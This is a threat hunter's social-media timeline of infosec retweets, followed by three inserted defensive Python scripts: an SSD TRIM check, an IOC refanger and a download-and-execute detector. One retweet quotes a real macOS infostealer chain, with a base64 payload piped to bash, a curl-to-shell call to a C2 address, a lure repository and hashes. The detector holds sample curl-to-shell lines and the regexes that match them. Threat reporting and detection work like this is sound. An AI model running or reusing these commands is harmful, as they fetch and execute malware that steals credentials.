bat
612 posts
@batlogged
thunter
169.254.0.1 · Joined April 2020
313 Following · 149 Followers
bat retweeted
mthcht (@mthcht2):
LOLEXFIL Living off the land Data Exfiltration method lolexfil.github.io
3 · 137 · 506 · 51K
bat retweeted
J⩜⃝mie Williams (@jamieantisocial):
hunting through telemetry for your own payload's compiler flags that you can't remember is peak infosec.
6 · 9 · 93 · 7.7K
bat retweeted
Dex (@DexFi_):
This will make more sense in 2026-2027
162 · 3.5K · 21.6K · 900K
bat retweeted
rootsecdev (@rootsecdev):
Good morning.
6 · 21 · 413 · 13.7K
bat (@batlogged):
@IntelSecX i miss the era before you paywalled your tool.
0 · 0 · 0 · 126
Intelligence Security X (@IntelSecX):
🔍 Intelligence Search: Email Investigation
Searching: noreply@uber.com
Result: 900 files found
📂 Leaks Logs (826 files):
├─ Users who received Uber emails
├─ Browser history containing noreply@uber.com
├─ Cookie files with Uber sessions
└─ Autofill data with Uber credentials
💾 Data Breaches (59 files):
├─ Email appears in breach compilations
├─ User inboxes containing Uber receipts
└─ Marketing databases
🧅 Darknet Tor (6 files):
├─ Underground forum discussions
└─ Uber account discussion threads
📋 Paste Sites → 6 files
🌐 Public Leaks → 3 files
⚠️ Why company emails appear in leaks logs: When someone is infected, leaks harvest:
├─ Entire browser history (every email address seen)
├─ Inbox contents (if webmail was accessed)
├─ Autofill containing @uber.com domains
└─ Cookies from uber.com sessions
💡 You don't need to be breached. Your customers getting infected = Your email in leaks logs.
🛡 For Organizations:
- Brand Monitoring → Track how your corporate emails circulate in underground sources
- Phishing Detection → Identify if attackers are referencing your noreply@ addresses
- Customer Exposure → Understand how many of your users have been compromised
- Incident Scope → Measure exposure beyond your own infrastructure
🎯 For Bug Bounty & Security Researchers:
- Validate scope of exposure during authorized assessments
- Demonstrate real-world impact to program owners
- Identify patterns: which company emails appear most in leaks logs
- Document findings for responsible disclosure reports
Understanding exposure is the first step to remediation.
🔗 DEMO intelligencesecurity.io/search/demo/in…
🤖 t.me/intelligencese…
#OSINT #InfoSec #BugBounty
2 · 13 · 83 · 6.5K
bat retweeted
Nana Sei Anyemedu (@RedHatPentester):
It will surprise you to know that a lot of Digital Forensics Investigators don’t really like the idea of investigating SSDs.

EVIDENCE CAN BE LOST AFTER A LAWFUL SEIZURE, AND SOLID-STATE DRIVES (SSDS) CAN ACT AS UNINTENTIONAL ANTI-FORENSIC DEVICES.

SSDs Break a Core Forensic Principle in Digital Forensics. One of the foundational assumptions in digital forensics, developed during the era of magnetic hard disk drives (HDDs), is: “Deleted data remains on storage media until it is overwritten.” This is a long-standing traditional principle.

Solid-State Drives can be viewed as unintentional anti-forensic devices because, unlike deliberate anti-forensic tools, they destroy potential evidence as part of their normal operation, without any malicious intent from the user. The assumption that deleted data remains until overwritten no longer universally applies. SSDs break this principle by design through:
1. TRIM
2. Garbage collection
3. Wear leveling

Because SSDs invalidate the “deleted data persists” principle, investigators must adapt by:
1. Prioritizing live analysis
2. Capturing volatile memory
3. Collecting system logs and cloud artifacts
4. Acting quickly before TRIM executes
Mololuwa | Cybersecurity - (The God Complex) (@cyber_rekk):

An SSD, which means Solid State Drive, is a type of storage device in a computer that saves your files, apps, and operating system, but it does this using small memory chips instead of moving parts like a traditional hard drive. Because it has no spinning disks or mechanical parts, it is much faster, quieter, more durable, and uses less power. This makes your computer faster, so programs open almost instantly, files transfer quicker, and your system boots up in seconds, saving you a lot of time compared to older hard drives.

3 · 27 · 249 · 29.5K
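The triage question behind the thread above is whether TRIM can still fire on seized media: does the drive advertise discard support, and is it mounted in a way that lets the kernel issue discards? The script below is an added example, not the tweet author's code. It parses the real column layout of `lsblk -D` and of `/proc/mounts`, but the device names, values and mount lines are constructed samples, and the "trim_possible" verdict (discard-capable and mounted read-write) is my own heuristic. A read-only mount only stops the kernel from issuing discards now; it does nothing about the drive's internal garbage collection.

```python
import re
from typing import Dict, List

# Constructed sample of `lsblk -D` output. The column names are the ones lsblk
# prints; the devices and values are made up for this example.
SAMPLE_LSBLK_D = """\
NAME        DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO
sda                0        0B       0B         0
└─sda1             0        0B       0B         0
nvme0n1            0      512B       2T         0
├─nvme0n1p1        0      512B       2T         0
└─nvme0n1p2        0      512B       2T         0
"""

# Constructed sample of /proc/mounts lines (same field order as the real file).
SAMPLE_MOUNTS = """\
/dev/nvme0n1p2 / ext4 rw,relatime,discard 0 0
/dev/nvme0n1p1 /boot/efi vfat rw,relatime 0 0
/dev/sda1 /mnt/evidence ext4 ro,noload 0 0
"""

# lsblk draws a tree with box characters in front of partition names.
_TREE_PREFIX = re.compile(r"^[\s│├└─]+")


def parse_lsblk_discard(text: str) -> Dict[str, bool]:
    """Map each device in `lsblk -D` output to whether it advertises discard
    (TRIM) support, i.e. both DISC-GRAN and DISC-MAX are non-zero."""
    lines = [line for line in text.splitlines() if line.strip()]
    header = lines[0].split()
    gran_idx, max_idx = header.index("DISC-GRAN"), header.index("DISC-MAX")
    result: Dict[str, bool] = {}
    for line in lines[1:]:
        fields = _TREE_PREFIX.sub("", line).split()
        zero = ("0", "0B")
        result[fields[0]] = fields[gran_idx] not in zero and fields[max_idx] not in zero
    return result


def parse_mounts(text: str) -> Dict[str, Dict[str, object]]:
    """Map device name (without /dev/) to its mount point, fs type and options."""
    mounts: Dict[str, Dict[str, object]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].startswith("/dev/"):
            continue  # skip pseudo filesystems such as proc or tmpfs
        name = parts[0][len("/dev/"):]
        mounts[name] = {"mountpoint": parts[1], "fstype": parts[2],
                        "opts": parts[3].split(",")}
    return mounts


def trim_exposure(lsblk_text: str, mounts_text: str) -> Dict[str, Dict[str, object]]:
    """Per device: can it discard, where is it mounted, and could the OS issue
    TRIM against it (read-write mount, whether via the `discard` option or a
    later fstrim run). Heuristic for this example, not a forensic standard."""
    capable = parse_lsblk_discard(lsblk_text)
    mounts = parse_mounts(mounts_text)
    report: Dict[str, Dict[str, object]] = {}
    for name, can_discard in capable.items():
        m = mounts.get(name)
        opts = list(m["opts"]) if m else []
        report[name] = {
            "discard_capable": can_discard,
            "mounted_at": m["mountpoint"] if m else None,
            "rw": "rw" in opts,
            "discard_opt": "discard" in opts,
            "trim_possible": can_discard and m is not None and "rw" in opts,
        }
    return report


def devices_at_risk(report: Dict[str, Dict[str, object]]) -> List[str]:
    """Names of devices where deleted data could be trimmed while mounted."""
    return sorted(name for name, info in report.items() if info["trim_possible"])


if __name__ == "__main__":
    exposure = trim_exposure(SAMPLE_LSBLK_D, SAMPLE_MOUNTS)
    for name, info in exposure.items():
        print(name, info)
    print("at risk:", devices_at_risk(exposure))
```

On a live box you would feed the functions the actual output of `lsblk -D` and the contents of `/proc/mounts`; the point of the check is to decide, before anything is unmounted or imaged, which volumes need the fastest handling.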
bat retweeted
inversecos (@inversecos):
What separates Chinese cyber ops from Five Eyes? Three things that shifted my thinking about this topic: 1. Early cyber training (90s-2000s) happened on live targets. Not sandboxes, not simulations...actual foreign infrastructure. The "practice" was the operation. Operational errors caught during IR back then weren't failures of tradecraft... they were the cost of learning on production. 2. The private sector operates as APT infrastructure. Cybersecurity companies founded by former 2000s hackers (Topsec, i-SOON, Integrity Tech) were later publicly linked to state-directed operations. The line between "legitimate vendor" and "APT contractor" is deliberately blurred (by design). 3. Operators don't stay siloed in their APT group. They rotate across teams for decades, often carrying the exact same tools and tactics with them. What we label as "different APT groups" is often the same people with different hats. This makes attribution way messier than the tidy narrative we see in threat reports. Worth reading this epic report published by the Zurich Centre for Security Studies if this stuff keeps you up at night: ethz.ch/content/dam/et…
17 · 160 · 811 · 109.7K
bat (@batlogged):
@jamieantisocial corp apps used in SOCs (re: excel, slack) will pick up both URI schemes and domains and attempt to hyperlink. the amount of alerts generated from misclicks... 💀
1 · 0 · 1 · 20
J⩜⃝mie Williams (@jamieantisocial):
i get ~𝓼𝓵𝓲𝓰𝓱𝓽𝓵𝔂~ annoyed when network IOCs are defanged more than once. e.g., 𝚑𝚡𝚡𝚙[:]//𝚠𝚑𝚈[.]𝚜օ[.]𝚎𝚡𝚝𝚛𝚊 am i being...
6 · 0 · 18 · 1.3K
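The exchange above is about indicators that arrive defanged more than once: the scheme rewritten to `hxxp`, separators bracketed, and the whole thing typed in a math-alphanumeric font with a homoglyph or two, so that nothing auto-links. The normaliser below is an added example, not the tweet author's code. It folds font variants with Unicode NFKC, maps a small constructed table of homoglyphs that NFKC leaves alone (the table is illustrative, not a complete confusables list), and then repeats the un-defang rewrites until the string stops changing, so stacked layers such as `[[.]]` are peeled one pass at a time. The sample IOC is the one from the tweet, spelled with code-point escapes so it survives copy and paste.

```python
import re
import unicodedata
from typing import List, Tuple

# Constructed table of homoglyphs that NFKC does not fold to ASCII. Only a few
# common ones are listed; a production tool would use the Unicode confusables data.
CONFUSABLES = {
    "\u0585": "o",  # Armenian small letter oh
    "\u043e": "o",  # Cyrillic small letter o
    "\u0430": "a",  # Cyrillic small letter a
    "\u0435": "e",  # Cyrillic small letter ie
    "\u0440": "p",  # Cyrillic small letter er
    "\u0441": "c",  # Cyrillic small letter es
}

# One pass of un-defanging. Separator fixes run before the scheme fix so that
# "hxxp[:]//" becomes "hxxp://" and then "http://" within the same pass.
_STEPS: List[Tuple[re.Pattern, object]] = [
    (re.compile(r"\[(\.|:|@)\]"), r"\1"),      # [.] [:] [@]
    (re.compile(r"\((\.|:|@)\)"), r"\1"),      # (.) (:) (@)
    (re.compile(r"\{(\.|:|@)\}"), r"\1"),      # {.} {:} {@}
    (re.compile(r"\\\."), "."),                # escaped dot
    (re.compile(r"\s+dot\s+", re.I), "."),     # "example dot com"
    (re.compile(r"\bhxxp(s?)://", re.I),
     lambda m: "http" + m.group(1).lower() + "://"),
    (re.compile(r"\bfxp://", re.I), "ftp://"),
]


def refang_with_depth(ioc: str, max_passes: int = 5) -> Tuple[str, int]:
    """Return the refanged indicator and the number of passes that changed it.

    A depth of 2 or more means the indicator was defanged more than once."""
    text = unicodedata.normalize("NFKC", ioc)           # folds 𝚑𝚡𝚡𝚙 -> hxxp
    text = "".join(CONFUSABLES.get(ch, ch) for ch in text)
    passes = 0
    for _ in range(max_passes):
        before = text
        for pattern, repl in _STEPS:
            text = pattern.sub(repl, text)
        if text == before:
            break
        passes += 1
    return text, passes


def refang(ioc: str) -> str:
    """Convenience wrapper returning only the normalised indicator."""
    return refang_with_depth(ioc)[0]


# The indicator from the tweet, written as escapes: mathematical monospace
# letters plus an Armenian "o" standing in for the Latin one.
SAMPLE = ("\U0001d691\U0001d6a1\U0001d6a1\U0001d699[:]//"
          "\U0001d6a0\U0001d691\U0001d688[.]\U0001d69c\u0585[.]"
          "\U0001d68e\U0001d6a1\U0001d69d\U0001d69b\U0001d68a")

if __name__ == "__main__":
    for raw in (SAMPLE, "hxxp[[:]]//example[[.]]com", "example dot com"):
        print(raw, "->", refang_with_depth(raw))
```

Keep the refanged form inside the analyst's tooling (lookups, rule authoring) and write the defanged form back into tickets and chat, since, as the reply above notes, the corporate apps around a SOC will happily hyperlink anything that looks like a scheme or a domain.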
bat retweeted
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx):
Honestly it doesn't matter much for defenders - code is code. We mostly talk about it to point out that threat actors STILL can't properly leverage AI and it's fun to roast them. This one goes out to everyone claiming "AI is a massive threat because TAs will use it for big bad things"
Washi (@washi_dev):

Maybe noob question. Why do we care whether malware was created with help of AI? I see people talking about it like it matters a lot, but for us defenders, it's still just code that you can reverse/write rules for, no? Besides, it's not as if most malware wasn't slop already..🙃

12 · 5 · 54 · 9.6K
bat retweeted
Who said what? (@g0njxa):
Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie)
Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2):
browndash1368[.]github[.]io >> macos[.]aidevmac[.]com
github[.]macos-developer[.]com/main
Then a bash script is shared:
echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash
Chaining more bash script from C2 (image 3):
/bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)"
Then downloading and executing a malicious Mach-O (image 4). Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2".
IOCs:
a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread)
ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)
5 · 16 · 72 · 5.8K
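The chain in the thread above is a textbook living-off-the-land download-and-run: a base64 blob echoed into `base64 -d | bash`, which in turn runs `bash -c "$(curl ...)"`. The detector below is an added example written from the defender's side, not the thread author's code. It runs three constructed regex rules over process command-line telemetry and, because the second stage only exists inside the base64 argument, it also decodes any base64 blob it finds and scans the decoded text as a second layer, reporting every URL in defanged form. The sample log lines are constructed; the host `203.0.113.10` is a documentation address and `example.com` a reserved name, so none of them is a real indicator.

```python
import base64
import re
from typing import Dict, List

# Constructed detection rules for download-and-execute chains. They are
# illustrative, not tuned against production noise.
RULES = {
    "base64_decode_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\s*\|\s*(?:ba|z)?sh\b"),
    "curl_to_shell": re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*curl\b"),
    "curl_pipe_shell": re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"),
}
URL_RE = re.compile(r"https?://[^\s\"')]+")
# A run of base64 alphabet long enough to hold a command; the lookbehind keeps
# it from matching the tail of a longer token.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{24,}={0,2}")


def defang(url: str) -> str:
    """Make a URL safe to paste into a ticket: hxxp scheme, bracketed dots."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_inline_base64(cmdline: str) -> List[str]:
    """Return every base64 blob in the command line that decodes to text."""
    payloads = []
    for m in B64_RE.finditer(cmdline):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: nothing to scan as a command
        if all(c.isprintable() or c.isspace() for c in text):
            payloads.append(text)
    return payloads


def scan_cmdline(cmdline: str) -> List[Dict[str, object]]:
    """Apply RULES to the raw command line and to each embedded base64 payload,
    so a stage hidden behind `echo <b64> | base64 -d | bash` is still seen."""
    layers = [("raw", cmdline)] + [("base64", p) for p in decode_inline_base64(cmdline)]
    findings = []
    for layer, text in layers:
        for rule, rx in RULES.items():
            if rx.search(text):
                findings.append({"rule": rule, "layer": layer,
                                 "urls": [defang(u) for u in URL_RE.findall(text)]})
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a list of telemetry lines; each hit records its 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        for finding in scan_cmdline(line):
            hits.append({"line": n, **finding})
    return hits


# Constructed process-telemetry lines in the shape of the chain described above.
STAGE2 = '/bin/bash -c "$(curl -fsSL http://203.0.113.10/stage2)"'
STAGE2_B64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_LOG = [
    "proc: bash -c 'ls -la /tmp'",
    "proc: sh -c 'echo \"AppInstaller: https://dl.example.com/Setup.dmg\" && echo "
    + STAGE2_B64 + " | base64 -d | bash'",
    "proc: " + STAGE2,
    "proc: curl -fsSL https://pkgs.example.com/install.sh | sh",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The second-layer scan is what makes the difference here: on the raw line the only visible behaviour is a base64 decode piped to a shell, while the decoded payload is where the actual download host shows up for blocking and for pivoting to the hashes the thread lists.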
bat retweeted
vx-underground (@vxunderground):
@PayPal @Microsoft Microslop Slopilot at PayPal Checkout, thanks to Slopya Slopdella, Chief Executive Slopiccer of Microslop
22 · 153 · 5K · 46.9K
bat retweeted
gaut (@0xgaut):
to all my fellow bookmarkors
1K · 9.2K · 62.6K · 1.1M